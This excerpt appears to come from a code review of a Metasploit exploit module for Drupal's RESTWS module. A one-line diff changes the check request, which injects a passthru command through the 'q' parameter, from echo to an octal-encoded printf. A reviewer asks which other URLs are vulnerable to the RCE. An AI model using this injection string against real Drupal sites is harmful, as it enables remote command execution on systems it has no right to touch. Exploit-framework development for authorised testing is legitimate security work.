modules/exploits/unix/webapp/drupal_restws_exec.rb

```diff
@@ -59,7 +59,7 @@ def check
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'index.php'),
       'vars_get' => {
-        'q' => "taxonomy_vocabulary//passthru/echo #{r}"
+        'q' => "taxonomy_vocabulary//passthru/printf '#{Rex::Text.to_octal(r)}'"
```

Comment:
Are you saying that the taxonomy_term url is also vulnerable to the RCE?  Are there other URLs as well that we should be aware of?